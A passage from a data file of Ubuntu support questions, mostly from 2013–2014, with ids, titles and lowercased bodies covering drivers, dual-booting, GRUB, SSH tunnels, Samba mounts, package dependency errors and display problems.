series/c210 series chipset family thermal management controller ( rev 04 ) 08:00.0 ethernet controller : qualcomm atheros ar8162 fast ethernet ( rev 10 ) i tried the steps given in `` how to get the tp-link tl-wn723n working on ubuntu ? '' .. but it doesnot seem to work ... any idea ?
416486	keepasshttp for ubuntu 13.10	im running keepass2 version 2.23 . i try to get the plugin running on ubuntu 13.10 . when i check google i see that a lot of people have it running in older versions . is there a way to run something like this in compability mode ? or do i have to look for an older version of keepass 2 ? i 've tried : keepasshttp.plgx and the two dll files : newtonsoft.json.dll keepasshttp.dll keepass is working perfectly . i have the problem on several computers . hereby the screenshot , after i put the keepasshttp file in de installation directory .
416488	full screen tty for virtualbox	i have 13.10 as a guest on virtualbox 4.3.6 on vista . i ca n't afford to have a de because of my graphically pathetic laptop or whatever the cause is , so i just thought i have plain tty 's to work with . it 's just that i can not find a way to maximize them to fill my display . i can not find any easy work arounds for this , i think a little tweak would do the trick , by i really do n't like to do that . is there an easy way to have tty in full screen ? i do have virtualbox additions installed . if i start x i would have a full screen , it 's just that i ca n't get it without x. i beg for help .
416489	black screen when connecting second display	i am using ubuntu 12.04 lts on my lenovo y570 laptop and i have installed the nvidia proprietary driver . everything works just fine , except for when i want to connect a second display via hdmi . if i go to settings , i see the new display is available , but when i turn it on and click apply , both my displays turn black . i ca n't even see the cursor and ca n't give it any commands . please help me solve this issue . thanks a lot ! le i tried doing the operation via nvidia x server settings , but there , the additional display is not detected lle if i connect the hdmi and start the laptop afterwards , both displays work until finishing the ubuntu loading screen . after the loading screen is done , they get black .
416491	windows and ubuntu dual boot curious problem	i hope someone will be able to solve my current problem . i am a linux newbie and i want to have a dual boot on my laptop . currently windows 8.1 is my main operating system and have 3 partitions ( os , media , documents + the os reserved partition created when installing windows 8 . ) looking at guides on the internet i shrunk my os partition and booted ubuntu 13.10 from usb . upon installation i noticed i can not modify my unallocated space and upon further research i found out that linux can handle only 4 active partitions on a drive . i copied everything from a partition to another and then deleted the respective partition . my 1tb hdd : c - 128 gb ( os ) d - 602 gb e - 200 gb drive e was deleted and transformed to unallocated space upon returning to ubuntu install i can not find the unallocated space but i have a /dev/sda3 of size d+e . what am i doing wrong ?
416499	problems after using boot-repair	installed 13.10 on existing windows computer . ran boot-repair , twice actually after the first time did n't work . ubuntu boots , windows shows up in grub but does n't boot . here is the boot-repair report http : //paste.ubuntu.com/6875256/plain/ thanks for input , i 'm overwhelmed by things i googled , it seems quite some answers are outdated , not sure about uefi .
416503	ssh alias results in ssh usage instructions	i have the following alias in my .bash_profile file : alias rlogin= '' ssh -l elykl33t rlogin.server '' of course this is not the actual username or server address . when i , after relaunching terminal , type `` rlogin '' i am met with : usage : ssh [ -1246aacfgkkmnnqsttvvxxyy ] [ -b bind_address ] [ -c cipher_spec ] [ -d [ bind_address : ] port ] [ -e escape_char ] [ -f configfile ] [ -i pkcs11 ] [ -i identity_file ] [ -l [ bind_address : ] port : host : hostport ] [ -l login_name ] [ -m mac_spec ] [ -o ctl_cmd ] [ -o option ] [ -p port ] [ -r [ bind_address : ] port : host : hostport ] [ -s ctl_path ] [ -w host : port ] [ -w local_tun [ : remote_tun ] ] [ user @ ] hostname [ command ] if i run the command source .bash_profile then the command works fine . am i doing something wrong ? is this type of command just not possible the way i 'm doing it ? thanks guys !
416504	phpstorm losing keyboard input	every now and again phpstorm will lose input from my keyboard . i can still click around , but it will not register any keys . other windows are fine . it takes a phpstorm restart to bring them back . it seems to happen most when i control+tab between open tabs i am running : ubuntu 13.10 phpstorm 7.1 jre 1.7.0_51
416510	why is xfs filesystem type greyed out in gparted ?	i have a large hd that only 1/2 of it is an ext4 for /home . i am trying to make another partition using the xfs filesystem but its greyed out in gparted . from what i have read here https : //wiki.ubuntu.com/xfs its already installed and loaded in the kernel module . ubuntu 13.10 x86_64
416513	basic question on setting higher screen resolution	i have two intel core2 duo desktop pcs both connected to an iiyama prolite e2407hds monitor through a vga switch box . i 've just reformatted the hard drive and installed ubuntu 12.04 on one . in descending order of priority , the things i want to be able to do on the ubuntu machine are ... 1 : run google chrome to access the internet 2 : run foobar2000 to play music 3 : run vlc to watch movies ( through tv connected as a second monitor ) 4 : code development ( specifically , port my foobar speech plugin so i can use it without windoze ) so far the only `` non-default '' thing i 've done is to install chrome as the default browser . that was easy , because it was already available in the ubuntu software centre which i accessed from the dashboard just using the mouse . the ubuntu machine has an ati radeon hd 4300 video card , which is more than capable of supporting the 1920x1080 resolution i 'm used to on this monitor . but when i go into system settings and select screen display , i 'm only offered a choice between 1024x768 or 800x600 . i downloaded *iiyama_drivers.zip , * opened it , and found a folder containing three files e2407hds with extensions *.cat , *.icm , and *.inf , but i do n't know what to do next . i 'm writing this question on the other pc ( running windoze xp because i 'm finding the relatively lo-res ubuntu browser window awkward ) . both machines are powered up , and i 've been using the switch box to swap between them . the ubuntu system has just `` auto-updated '' itself with several things , including something called fglrx which appears to be a proprietary driver for ati radeon video cards . but the additional drivers facility in ubuntu still says no proprietary drivers are in use on this system , and the screen display facility still only offers the lower resolutions . please note that i 'm a complete noob as regards unix/linux/ubuntu . i do n't even know how to access the `` command-line prompt '' , let alone what or why i should type anything in there . and i 'm leery of experimenting because short of re-installing i 've no idea to get back a functional system if i mess up . so - how can i easily ( ideally , using just a mouse ) improve my screen resolution ? ( i know i should only ask one q per post , but a link to `` system snapshot backup '' would be good , too . )
416521	13.10 login loop workaround creates unwanted root access	neither lightdm not gdm actually allow me to log into any account but guest . my solution , so far , has been to drop to the shell ( ctrl+alt+f1 ) login , then sudo startx . the xauthority file never locks without sudo . doing it this way , i 'm root . i have not been able to successfully access a non-root terminal from root . as a consequence when i want to run some file or program which objects to being run as root , i have to switch to the guest session . i really ca n't believe how broke this release was , the same thing happened on 2 computers . i do n't so much mind going around the normal login , however the unwanted root access this creates is a major issue . edit : after further investigation i found that su username was exactly what i was looking for to de-root a root terminal
416522	how can i open and close an ssh tunnel along with firefox ?	i have a proxy server which i connect to like so ssh -l 2001 : localhost:8888 -n myserver.com -p 443 i then open up firefox firefox -p `` sshproxy '' ( it starts firefox configured to use port 2001 ) . i browse a bit , then close firefox and then stop the tunnel . what i would like to do is automate it : open the tunnel , then open firefox . when i close firefox , i 'd like to close the tunnel too . is this possible in a simple script ? i have tried ssh -l 2001 : localhost:8888 -n myserver.com -p 443 & & firefox -p `` sshproxy '' but only the ssh bit executes , firefox does not open . if i reverse the order , then ssh only opens after i close firefox . with help below i have used this simplified script : # ! /bin/bash -e # start ssh ssh -l 2001 : localhost:8888 -nf myserver.com -p 443 & # start firefox firefox -p `` sshproxy '' & # kill the ssh port 2001 when firefox stops trap `` ps aux | grep ssh | grep 2001 | awk ' { print \ $ 2 } ' | xargs kill '' exit sigint sigterm wait
416524	show unity switcher ( alt+tab ) when in full screen	when i use alt+tab when in full screen mode in an application window i am not able to see the apps i am switching too . anyway to bring the switcher display to the top ?
416527	gnome desktop 3.10 installation	i want to ask some huge problem . i tried to install gnome 3.10 and it broke my ubuntu . i tried to reverse the process but still failed . i tried to uninstall all gnome package and my nvidia driver . bt when i reinstalled it , it still broken . now , my ubuntu only displaying the command line and can not login to my destop . how can fix this ? i 've been like this before because i 'm trying to remove all gnome package using apt-get remove gnome* . i think when i remove and reinstall it , it will back to normal .
416528	changing permissions for folders and files in /var/www/ ?	i am quite new to ubuntu and i have been trying to install builderengine a content management system to my ubuntu server 12.04 lts i have figured some things out but i am stuggling with permission for files and folders . i know i have change the permission for folders and files in /var/www/ to be able to read and write files . but i am not sure what to do . all i know is never use chmod -r 777 /var/www/ cause that can read/write/excute files . was thinking of trying sudo chown -r www-data : www-data /var/www/ but not sure
416530	currently inoperable keyboard with partial functionality in host/fully functional in virtual machine 13.10	to be succinct as to the issue , i 'm running ubuntu 13.10 and have had no issues up to this point with the hardware compatibility ; however , upon setting up my workstation today , i was aware of a sudden difficulty in logging into certain accounts online as well as having difficultly in logging back in from my screensaver- the keyboard seems to have switched the characters on a certain portion of the keyboard given that some of the keys are fully functional while others- which would normally select letters of the alphabet- populating numeric results on screen . this led me to the question as to whether it was my hardware or the software itself . the hardware is roughly 10 monthly old and in excellent condition . i sprayed the keyboard with co2 and rebooted . no dice . i run multiple virtual machines daily so i decided to boot into one to possibly decipher whether it was , indeed , indeed a software issue . my thought was that if the keyboard functioned correctly in my vm , it was a mis-configuration on my host o.s . i booted into whonix workstation and the pulled up the google browser- it recorded my keystrokes perfectly . the question that i 've posed here is not typed by the currently inoperable key board on my host machine - an asus q400a running 8 cores of the latest i7 cpu with an upgrade to 16 gb ram . so , what suggestions do you fine gentlemen and ladies that may resolve this situation , or than a restore as i 've already attempted such . thanks for your time and assistance-
416531	problem with hibernate	i have just installed hibernate . when i typed hibernate the first time , the system seamed to hibernate properly ( displayed a message about dumping memory , then shut down ) . but no it no longer boots up anymore . i managed to boot into the system using an older version of the kernel in grub boot manager , but can not boot normally with my lastest version . i 'm using ubuntu 13.10 any hint ?
416532	xbox 360 controller through playonlinux	i am running skyrim through playonlinux and i want to get my xbox 360 controller to work on the game . i am using wine 1.7.11 , ubuntu 12.04 lts , and whatever version of playonlinux is available through usc .
416535	mount samba share at login using startup script ( not fstab )	background i 'm trying to automatically execute a command that mounts a password protected samba share when my user logs in . the catch is , i share my laptop with another user , and i do n't want the samba share to be mounted when she logs in . i only want it to be mounted when i log in . that rules out editing my fstab file because i want this to be user-specific . prior research i 've searched and reviewed lots of questions and answers related to mounting samba shares , including `` mounting samba shares at boot/login and using script '' and `` proper fstab entry to mount a samba share on boot , '' but most answers involve editing fstab , which works great for most people but that 's not what i 'm looking for here . what i 've done so far i can manually mount the samba share from the command line by doing this : sudo mount -t cifs //centaroo.local/me /media/me -o uid=scott , gid=scott , credentials=/home/scott/.smbcredentials , iocharset=utf8 , sec=ntlm , file_mode=0600 , dir_mode=0700 problem statement the previous command works great when i execute it from the command line - it prompts me for my password to gain sudo permission , i enter it , and the command runs . the problem is , when i add the exact same command to the `` command '' field in startup applications preferences > edit startup program , save my changes , reboot , and log back in , the samba share is n't mounted like i expected . i suspect it 's because i need root permission to run as sudo , and with the script in the startup programs preferences , there 's no way for me to enter it , so the script simply fails . how can i work around this ?
416536	formatting a usb flash drive as ext4	i 'm making a custom bootable usb flash drive with a persistent partition . formatting the partition as ext2 obviously makes the filesystem very sensitive to improper unmounting . i remember a while back that ubuntu ( and other distributions ) had problems when flash memory was formatted as ext3/4 , writing data so frequently that the flash drives died very quickly . have these problems now been resolved ? is there any reason to not use a journalled filesystem when formatting a usb flash drive ?
416538	missing package in ubuntu sdk - qtdeclarative5-ubuntu-webapps-api	installing the ubuntu sdk failed because of missing package qtdeclarative5-ubuntu-webapps-api this was the message from apt-get : the following packages have unmet dependencies : ubuntu-html5-sdk : depends : qtdeclarative5-ubuntu-webapps-api but it is not installable depends : ubuntu-html5-container but it is not going to be installed can i get this package somewhere else ?
416539	in grub2 , how can i see which driver module will be loaded ?	is there a way i can list what modules ( and versions ) will be loaded during next boot ?
416540	icons are not displayed properly after removing gnome	i installed gnome on xubuntu and after trying it for a few hours i tried to remove it from xubuntu . after removing the gnome sudo apt-get autoremove gnome* some icons are not displayed . i can change the icons in the `` appearance '' but when i chose my favourite icon set some of them are not displayed and i get a blank white thing instead of an icon .
416544	what is the name of system settings for terminal	what can i type to launch system settings from the terminal
416553	modify keyboard config file	being a french canadian , i like to have easy access to accents like èéà , but would like to modify their locations and replace them by { } [ ] for programming purposes ( currently located on level 3 of keys 7 8 9 0 ) . i figured i should modify the file corresponding to canadian multilingual standard layout . i found it in /usr/share/x11/xkb/symbols , in the ca file . i modified the entries for `` canadian multilingual '' , then called setxkbmap ca multix . modifications did n't work . i opened another xserver window ( sudo xinit -- :2 ) , called setxkbmap ca multi again , no effect . i rebooted , to no avail . i still see the modifications in the config file . am i modyfing the good file ? i ran sudo find -name xkb -print to see if i was modifying in the wrong folder , but all other folders named as is were empty/full of gibberish p.s . : using ubuntu 12.04 p.p.s . : i checked all folders in xkb/symbols , to no avail .
416554	optimus graphics in kernel 3.12.9	quick question : since kernel 3.12.9 supports hybrid graphics laptops , it means it can enable/disable nvidia on its own , right ? at least i can tell that from the battery life i get . so , since i have not installed any driver at all , its now using intel hd and possibly noveau , right ? suppose i want the latest nvidia driver , what version do i install ? i know about project bumblebee , and i do n't want to install it . i used to install it , when the kernel did n't have proper support . now that it works out of the box , i just need to know if i can go and install the nvidia driver edit : forgot to mention . my laptop is an ultrabook s56cm from asus . nvidia 635m intel hd4000
416555	missing package when installing ubuntu sdk on 13.10 64 bit	when i try to install the ubuntu sdk on my 64 bit saucy i get a missing package issue . the following packages have unmet dependencies : ubuntu-sdk : depends : qtcreator-plugin-ubuntu but it is not going to be installed e : unable to correct problems , you have held broken packages . can anyone advise how to remedy this issue ?
416556	should n't dconf-editor and gsettings access the same database ?	this is a basically 'academic ' question -- - to try to understand better the configuration system innards . i understand that the dconf system is the new configuration system in gnome3 that has replaced the ( deprecated ) gconf ; this is quite clear from gconf , dconf , gsettings and the relationship between them . it seemed to me that the programs gsettings and dconf-editor where just two different way to access the same dconf database , which is corroborated in what is dconf , what is its function , and how do i use it ? edit : i discovered that someone noticed it as a difference in case in some schema name , see here -- - are dconf schema names case-sensitive ? ; but it seems that the differences are not restricted to that . in one of the answer there is an example of mismatch , but i did n't find an explication of why . but lately i discovered that the keys accessible from gsettings and dconf-editor are not the same . for example , settings for vino are in dconf-editor under org.gnome.desktop.remote-access ( see screenshot below ) while in gsettings they are under org.gnome.vino . there is some documentation that explain the difference ? in gsettings : ( 0 ) samsung-romano : ~/tmp/try % gsettings list-recursively org.gnome.vino org.gnome.vino alternative-port uint16 5900 org.gnome.vino authentication-methods [ 'none ' ] org.gnome.vino disable-background false [ ... ] and : ( 0 ) samsung-romano : ~/tmp/try % gsettings list-recursively org.gnome.desktop.remote-access no such schema 'org.gnome.desktop.remote-access' but in dconf-editor :
416559	alot of problems dualbooting win7 and any linux dist	i 've been trying to install ubuntu alongside ( read dual-boot ) my win7 installation . the problem is that apparently i can only have one os at the time om my computer ... or so it seems atm . when i install win7 it all goes through and i have a clean win7 installation and it works . and i know i can run ubuntu as my only os on my machine cus i 've been doing that for the past 6 months ... when i have my clean install of win7 and i boot up my ubuntu usb i get only two options when i want to install : erase everything ! ! ! ! or `` something else ... '' - and the `` something else '' always ends up in the same mess : that everything gets deleted and i can only have ubuntu or win7 as my os ... why does this happen ? i have virtually no clue what is going on.. i have updated my bios for asus g55vw to version 217 and tried and tried again only to fail . i can boot both systems with usbs and i can install them clean with no dual boot.. beyond that i clearly can not seem to get anything to work . and this is the same for linux mint 16.. the ubuntu version is 13.10 64bit sudo fdisk -lu warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x8d660850 device boot start end blocks id system /dev/sda1 1 1465149167 732574583+ ee gpt partition 1 does not start on physical sector boundary . sudo parted -l model : ata st9750420as ( scsi ) disk /dev/sda : 750gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 512mb 511mb fat32 boot 2 512mb 742gb 741gb ext4 3 742gb 750gb 8541mb linux-swap ( v1 ) i hope you 're able to answer why this acts the way it does.. thank you for reading
416561	how would i upgrade ubuntu touch to the latest development version ?	i have ubuntu touch 13.10 installed on my nexus 4 . i would like to update it to 14.04 do n't think i should have to reinstall android and start over .
416565	ca n't get my wireless to work	i have an alfa wifi adapter in right now , but my integrated wifi adapter will not connect i have tried the addnaul driver and still seems not to do anything
416566	new ubuntu user , and i ca n't change the directory in the terminal	i have been a windows user all my life . i just switched to ubuntu 13.10 ( saucy salamander ) on one of my laptops . it 's neat and all , but i 'm having difficulty with the terminal . i am trying to install komodo edit , but i do n't understand it . i 'm using this site `` http : //docs.activestate.com/komodo/7.0/install.html # installing_komodo_on_linux '' the terminal will not let me change my directory . i have the komodo edit file in home/downloads/keep/applications/komodo edit . whenever i try to cd to anywhere besides home it says 'no such file or directory ' . that is my current problem , but i also barely understand the terminal , as well as how to download/install applications using ppa . any help is greatly appreciated .
416569	terminal does not return when typing	i know this is weird but out of the blue , today i copied a long command into the terminal and instead of word wrapping as its supposed to , it started overwriting the same line . the command executed just fine , but it became unreadable . typically when something like this happens , you can just press enter a few times and it fixes , but not in this case . i restarted terminal and even rebooted and its the same story . i might think it has something to do with the fact that i edited my /etc/bash.bashrc file to customize the prompt with color , etc . but i did that several days ago and this did n't happen after i edited it . i saved a backup just in case so if anyone thinks it might be that , i 've included the output of the diff of the two files : $ diff /etc/bash.bashrc /etc/bash.bashrc.bak 19c19 < ps1='\e [ 1 ; 32m\u : \e [ m\w\n\e [ 1 ; 33m\ $ \e [ m ' -- - > ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' any ideas are helpful , this is a really strange problem .
416572	switch profile in konsole from command line ?	i know that its possible to set profile for new tab , but what if i need to switch profile for current tab ?
416573	error when using displayport monitor - lenovo x220	when i connect my acer 21.5 '' lcd monitor to my lenovo x220 using a displayport to vga connector , the monitor shows up under 'displays ' but when i enable the monitor , it doesn'twork and i get the following message in /var/log/syslog : [ drm : intel_dp_complete_link_train ] *error* failed to train dp , aborting if i connect the monitor using a vga cable and the vga port , it works as expected . this laptop has the intel i5 and hd 3000 graphics chipset . running 12.04 , 3.8.0-35-generic x86_64
416575	creating a link in the menu of ubuntu	please , how can i make a link in the menu of ubuntu to launch an application ? thank you .
416576	installed ubuntu guest in ubuntu host . can not use ssh ?	i have a ubuntu 13.04 host , and a guest vurtual box ubuntu 13.10 . i have ssh intalled on both , however i can not connect through ssh . the error thrown is `` connect to host 19.0.x.xx port 22 : network is unreachable '' i am quite new to unix , any help would be verymuch appreciated . thanks !
416577	why the workspace switcher was changed ?	after installing ubuntu 12.04 , my workspace was like this : but , after updating , it was changed into this : how to restore ? ps . could anyone tell me the name of the switcher in the first picture ?
416581	how can i move grub 2 config to separate partition without moving /boot ?	i have a netbook ( it is what i use to tinker around ) with a 250 gb hdd with 4 primary partitions : sda1 50 gb ext4 mounted to / sda3 ~162 gb ext4 mounted to /home sda4 ~20 gb ext4 empty and unmounted sda2 3 gb swap i want to move my grub config to sda4 along with my live isos . i want to be able to install any distro and not affect those grub settings ( or be able to return them quickly ) , and boot the live discs from grub . i know how to add them to the grub menu , but i want to move grub 's config to the other partition . i know i can move /boot , but if i change to a wrong distro it may not boot . i had two ideas : install a small os to sda4 and run grub from there , but every time i install a new os , i will have to change the default boot . if it is set to boot the last booted one , i would have to remember to change it back . i want a way to do it without doing any of those things .
416583	how to set interval of synchronization in ubuntu one ?	i want to ask about how to set interval of synchronization in ubuntu one ? because i do n't want to immediately synchronize my changes of file ( because in 1 minute there can be more than 10 changes in a file ) . this behaviour makes conflict and sometime my file reverted back to previous changes . if there is a configuration for synchronize every hour or only synchronize for files that has changed for more than 10 minutes maybe it would be helpful . thank you
416584	audio router / patchbay	i have a desktop that has a integrated surround sound jacks on the back , ( the green/yellow/black/etc ) ... anyway , i want to take one line input , and split it to at least two other ( ideally stereo ) outputs . not sure if jack is what i want . i would like to control volume levels via command line . ( gui would be okay ... ) not quite sure if this thing is possible , but any nudges in the right direction would be great ! -- dl
416585	how do i extract the source mac from a [ ufw block ] entry ?	i have the following ufw block entry . how do i get the source mac ? i 'm getting a ton from the same mac=e8:11:32 : cb : d9:42:54:04 : a6 : ba:22 : f8:08:00 doing port scanning . if it matters , i 'm using 12.04 lts . feb 4 17:46:06 chromebox-server kernel : [ 663960.096168 ] [ ufw block ] in=eth0 out= mac=e8:11:32 : cb : d9:42:54:04 : a6 : ba:22 : f8:08:00 src=123.129.216.39 dst=192.168.1.10 len=48 tos=0x00 prec=0x20 ttl=115 id=49547 proto=tcp spt=1535 dpt=22 window=65535 res=0x00 syn urgp=0
416588	.xinitrc not sourced in 13.10	i am using gnome / lightdm / ubuntu 13.10 . i have some customisations i want to do in ~/.xinitrc , but it seems this file is not being sourced at startup . i 've tried also with .xsessionrc and .xprofile with no luck . and reading /var/log/xorg.0.log did n't have any hints for me unfortunately . my current workaround is just to run a custom shell script after login , but it does n't seem correct .
416590	ubuntu 12.04 will not boot - purple followed by black	trying to boot ubuntu 12.04 , it 's been working for almost a year . i installed updates , and it worked after restart . but now when trying to boot ( second boot after restart ) , it shows the purple screen for a few seconds ( no ubuntu + dots at the bottom , just blank purple ) then gives me a blank black screen with a terminal underscore at the top left and nothing else . it does n't respond to keyboard or mouse . i ca n't boot a terminal , and ctrl-alt-f1 did n't give me a password prompt . how can i start to work on this ?
416591	ubuntu 12.04.3 desktop hangs during installation in virtualbox	i checked the list of responses that were suggested and did n't find anything that helps . my problem is that the installation has hung up when performing a `` restoring previously installed packages '' function near the end of the installation . my hardware is hp pavilion with 4 gb ram using intel core 2 duo processor with windows xp professional os - i have two drives with plenty of space . the os will be installed on one drive , and the ubuntu.vdi will be given 50 gb on another drive . i installed virtualbox 4.3.6 and created a virtual machine set up with linux os , ubuntu version ; 512 mb base memory ; controller - ide secondary master pointing to ubuntu-12-04-3-desktop-i386.iso ; controller - sata port 0 : ubuntu.vdi ( normal , 50.00 gb ) . i 've not tried an additional installation , seeing from previous conversations that it may cause additional problems because of old vdi files , and that partition issues may also result . i 'm new to ubuntu , and i 'm far from being a `` geek '' - but i 'm also not completely computer illiterate . i appreciate any assistance anyone can provide - thanks for taking time to respond , and for sharing your knowledge/experience ! let me know if you require additional information .
416592	oneko on 13.10 : superimposed bitmap problem	has anyone tried the cute cat-and-mouse oneko on ubuntu 13.10 . i noticed that the base bitmap is always superimposed with the other bitmaps , such as when chasing the mouse . the result is that the graphic rendering is scrambled . would like to have fun with oneko but this is preventing it . any ideas ? thanks !
416595	grub takes forever to get to	so grub takes about 15 seconds to get to , it will show a white underscore ( _ ) and it will indent and go down a few lines and repeat this process about 3-4 times before it reaches grub . here is my setup : first drive to boot from is my hdd ( 320gb hdd that is separated in half , i use half of it for linux os and files , then the other half for windows files , it is also the drive that has grub on it ) . my windows os drive is my ssd ( 128gb ) and it is set to boot 2nd in bios . then i have a third drive ( 2tb external drive ) that just stores files and has never had any boot info on it . os information : windows 8.1 , ubuntu 12.04.3 is there some way to fix the slow loading of grub ? i really would like an instant grub menu to popup when i start my computer . thanks
416596	can not print pdfs with images	i can successfully print text files or webpages but when i print a pdf file with images , the printer does not print the images . in fact there is a white space instead of the image on the printed page ! i 'd like to know what should i do in order to print the pdf file with the image . i do n't want to print the pdf to a file , using cups-pdf . i want to have a hard copy of my pdf file !
416597	ca n't start apache2 with error `` bus error ''	does anyone know what cause my apache2 could n't start properly in ubuntu ? i ran /etc/init.d/apache2 start outputs * starting web server apache2 /usr/sbin/apache2ctl : \ line 132 : 29125 bus error ( core dumped ) \ $ httpd $ { apache_arguments } -k $ argv action 'start ' failed . \ the apache error log may have more information .
416599	disable touchpad while click held down	i am having a specific issue with my macbook trackpad . i have configured my settings almost perfect , except for one issue : i would like to disable my touchpad while i am clicking . when it is not disable while i am clicking , it causes the mouse to jump unnecessarily causing me to misclick . i have looked through the synaptics settings and have not seen a setting for this , does anyone have some insight or should i look into writing a script to solve this problem ? cheers , ian
416605	wine 1.7 not installing	so i tried installing wine 1.7 today , started by typing this : sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.7 then i got this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.7 : depends : wine1.7-amd64 ( = 1:1.7.11-0ubuntu1 ) but it is not going to be installed depends : wine1.7-i386 ( = 1:1.7.11-0ubuntu1 ) e : unable to correct problems , you have held broken packages . how do i fix this ? i heard that one of the more recent 1.7 builds fixed the steam login crash and i would really like to play some of my windows games . i 'm pretty new to ubuntu so i could use some help
416606	backintime can not find my snapshots	my hard drive failed and i had to do a fresh install of ubuntu ( 13.10 ) . fortunately ( maybe ) i had backed up most of the folders from /etc and /home using backintime ( root ) . i installed bit on the new system . the bit information was stored in a separate hd , with the same path as was used for the original backup . i copied the config file from the last snapshot : /backup/backintime/ { old host name } /root/1/ { latest backup folder } to ~/.config/backintime/ . when i try to use bit it can not find my snapshots . i looked at the config file following the hint given here : ca n't reset backintime snapshot path however , the path is correct so i did not have to change it there . the hostname on the new system is different than the old machine , could this cause a problem ? is there any other way to restore the files , even if to a different directory ? if so , how ? is there something else i need to change somewhere ?
416609	my wallpapers are pixelated	i have downloaded multiple backgrounds over 4000x4000 pixels , and somehow they still end up pixelated when i set them as my background in unity . why is this happening ? edit : here is a screenshot of the desktop , keep in mind , you have to zoom in to see how pixelated it actually is .
416611	unable to install firefox 27 on ubuntu 12.04	i am trying to install firefox 27 through canonical repos but it shows firefox 26 as the latest version . how do i install firefox 27 on ubuntu 12.04 ?
416612	error installing ubuntu touch	onyeka @ sanfrost : ~ $ sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot [ sudo ] password for onyeka : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : phablet-tools : depends : click but it is not installable recommends : imagemagick recommends : ubuntu-dev-tools but it is not going to be installed e : unable to correct problems , you have held broken packages . onyeka @ sanfrost : ~ $
416615	how to install ubuntu on my xperia arc s ? ( please note i love this handset so i have neither rooted or flashed )	please note i am novice at this installation . please point me to answers not to other forums . thank you for your help .
416618	is it possible to have real-time dyamic-range compression for my audio out ?	sometimes i 'll be watching a video , and the audio 's volume will vary greatly . i have to turn the volume up to hear the quiet parts , and then the loud sections blast through the speakers . is it possible to have in-line software audio compression before it hits the speakers ? ( n.b . i 'm talking about real-time dynamic-range compression , not data compression . )
416619	download error for eclipse	when i tried to download ( through ubuntu software center ) eclipse ide , after downloading and while dearchiving it says wrong format and not able to dearchive - why i am not able to download ?
416620	maas internal server error after update	i 'm trying to deploy openstack havana over ubuntu precise using juju . this is what i do exactly : install ubuntu server with maas following the official guide . sudo maas createsuperuser sudo apt-get install maas-dhcp maas-dns sudo ufw disable sudo apt-get install python-software-properties sudo add-apt-repository cloud-archive : havana sudo apt-get update & & sudo apt-get install juju-core sudo apt-get update & & sudo apt-get dist-upgrade sudo maas-import-pxe-file at this point everything seems o.k . till i reboot the server . when i browse maas url i get internal server error `` apache/2.2.22 ( ubuntu ) server at 192.168.50.240 port 80 '' this is the last errors at apache2 log http : //pastebin.ubuntu.com/6877380/ i tried this for three times and i got the same error . any clue what i did wrong ? thank you
416621	install windows 7 while running ubuntu	so i have ubuntu 12.04 installed on my pc . i have the windows 7 files on a flash drive ( boot drive ) and i also copied them to my desktop . obviously i cant run the setup.exe because .exe is a windows command so how do i install windows ?
416622	how do i configure mysqld to allow ssh tunnel connections	i 'm looking to find out how to configure mysqld to accept socket connections from an ssh tunnel . this is what i am currently doing : create the tunnel : $ ssh -n -l 8033 : localhost:3306 sqlserver test the connection : $ telnet localhost 8033 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . [ 5.5.35-0ubuntu0.12.04.2 $ zdhzm6`ďż˝oden { am % knf7mysql_native_password now connect with mysql client : $ mysql -p 8033 -u root -p password : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) this is not particular to ubuntu , as it has also affected me on centos . i have tried changing the apparmor profile to allow read and write access from the socket/pid changes to /etc/apparmor.d/usr.sbin.mysqld on sqlserver : # had to modify to allow tunnel requests . original lines commented below . # /var/run/mysqld/mysqld.pid rw , # /var/run/mysqld/mysqld.sock w , # startcustom /var/run/mysqld/mysqld.sock rw , /run/mysqld/mysqld.pid rw , /run/mysqld/mysqld.sock rw , # endcustom i tried using aa-complain and disabling apparmor all together . same error . not apparmor 's fault . this implies that it is mysqld 's configuration that is blocking the connection . i edited /etc/mysql/my.cnf to comment out the bind-address so that it would listen to all possible incoming connections . no go , same error . none of these solutions i found on stackexchange seem to work . any idea what i am doing wrong ?
416623	how to share/transfer ubuntu 13.10 downloaded packages	i have 25 system which are working on windows 7 os and now am installing ubuntu 13.10 in all . after installing ubuntu in one of my systems i found there are several updates to be downloaded , due to internet usage limitations i ca n't allow download for each system . is there a way to share/transfer the updates installed in one system to other systems ? i have seen how to share packages with other ubuntu systems ? but we do n't have a server with us yet .
416624	telnet to godaddy email server on ubuntu desktop	i 'm on my home computer ( ubuntu desktop ) . i am reading the documentations for the imap protocol . and i want to connect to my email host at imap.secureserver.net on port 993 . then i want to issue a few imap commands like logging in : a01 login myuser mypassword response : a01 ok user logged in but when i run telnet on terminal , i get a message `` connection closed by foreign host '' : $ telnet imap.secureserver.net 993 trying 72.167.218.187 ... connected to imap.secureserver.net . escape character is '^ ] ' . a01 myuser @ mysite.com password connection closed by foreign host . any idea why it closes connection rather than giving me an ok response ?
416627	audio is higher tone than it should be	on movies , u-tube etc they sound like ducks , synchronized but too high . on a guitar tuning site the tone that comes is one exact tone too high .
